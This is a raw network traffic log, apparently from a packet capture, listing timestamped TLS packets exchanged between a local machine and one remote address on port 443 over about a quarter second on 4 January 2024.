                                                                                    Jan 4, 2024 08:30:04.274279118 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.274283886 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.274426937 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.274786949 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.274801970 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.274842978 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.274856091 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.274861097 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.274913073 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.276731014 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.276751995 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.276767015 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.276771069 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.276809931 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.276838064 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.276922941 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.276981115 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.278585911 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.278649092 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.278652906 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.278729916 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.278798103 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.278846979 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.279716015 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.279789925 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.279793024 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.279870033 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.280551910 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.280596018 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.282330990 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.282346010 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.282426119 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.282432079 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.282484055 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.287064075 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.287108898 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.287132025 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.287137032 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.287166119 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.287281036 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.287303925 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.287333012 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.287339926 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.287373066 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.288511038 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.288537025 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.288568974 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.288574934 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.288594007 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.290524960 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.290539026 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.290599108 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.290605068 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.292293072 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.292309046 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.292354107 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.292357922 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.292376041 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.292376995 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.292392015 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.292423964 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.292428017 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.292448044 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.293786049 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.293801069 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.293860912 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.293868065 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.295145035 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.295160055 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.295217037 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.295227051 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.296955109 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.296967983 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.297029018 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.297035933 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.341988087 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.347366095 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.347387075 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.347496986 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.347507954 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.347549915 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.347585917 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.347637892 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.457287073 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.457323074 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.457468987 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.457489967 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.457530022 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.458476067 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.458491087 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.458559036 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.458569050 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.458614111 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.459897995 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.459912062 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.459969044 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.459975004 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.460011959 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.460896969 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.460911036 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.460963011 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.460973978 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.461021900 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.461890936 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.461905003 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.461968899 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.461973906 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.462007999 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.462914944 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.462929964 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.462979078 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.462985039 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.463040113 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.463975906 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.464010954 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.464034081 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.464037895 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.464066029 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.464086056 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.465020895 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.465038061 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.465099096 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.465102911 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.465142012 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.465629101 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.465689898 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.466054916 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.466114998 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.467137098 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.467164040 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.467201948 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.467206001 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.467227936 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.467252016 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.468396902 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.468420982 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.468456030 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.468460083 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.468488932 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.468509912 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.468630075 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.468677998 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.469973087 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.470000982 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.470032930 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.470036983 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.470045090 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.470968962 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.470983982 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.471033096 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.471039057 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.471076012 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.471467972 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.471524954 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.471529007 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.472482920 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.472503901 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.472547054 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.472553015 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.472562075 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.473620892 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.473679066 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.473685980 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.473694086 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.473747015 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.473751068 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.474019051 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.474062920 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.474066973 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.474097967 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.474486113 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.474543095 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.474546909 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.475236893 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.475291967 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.475296021 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.476540089 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.476573944 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.476592064 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.476599932 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.476635933 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.477637053 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.477673054 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.477693081 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.477696896 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.477708101 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.479885101 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.479899883 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.479950905 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.479955912 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.479979038 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.481033087 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.481046915 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.481105089 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.481108904 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.482234001 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.482268095 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.482291937 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.482295990 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.482311010 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.483278036 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.483290911 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.483357906 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.483364105 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.484497070 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.484524965 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.484569073 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.484574080 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.484601021 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.485646009 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.485683918 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.485743046 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.485749006 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.485785961 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.486721039 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.486748934 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.486799002 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.486804962 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.486816883 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.487736940 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.487751007 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.487796068 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.487807035 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.487833023 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.488919973 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.488940954 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.488991022 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.488997936 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.489029884 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.490042925 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.490056992 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.490112066 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.490117073 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.491126060 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.491146088 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.491184950 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.491190910 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.491230011 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.492207050 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.492222071 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.492266893 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.492273092 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.492321014 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.493380070 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.493398905 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.493439913 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.493448019 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.493482113 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.494518042 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.494532108 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.494575024 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.494581938 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.494596004 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.495898962 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.495922089 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.495960951 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.495965958 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.495978117 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.496958017 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.496988058 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.497020006 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.497025967 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.497056961 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.498037100 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.498058081 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.498097897 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.498102903 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.498150110 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.499217033 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.499231100 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.499283075 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.499289036 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.500479937 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.500499010 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.500531912 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.500536919 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.500565052 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.501708984 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.501723051 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.501771927 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.501781940 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.502939939 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.502960920 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.503022909 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.503029108 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.503045082 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.504297972 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.504312038 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.504362106 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.504369020 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.505462885 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.505484104 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.505517960 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.505523920 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.505556107 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.506477118 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.506494045 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.506529093 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.506535053 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.506570101 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.507572889 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.507595062 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.507987022 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.507992029 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.508578062 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.508598089 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.510164022 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.510196924 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.511486053 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.512494087 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.512505054 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.512542963 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.512562037 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.512569904 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.512600899 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.512615919 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.512672901 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.512679100 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.512787104 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.551006079 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.551026106 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.551071882 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.551100016 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.551114082 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.552544117 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.552571058 CET44349719104.21.89.193192.168.2.6
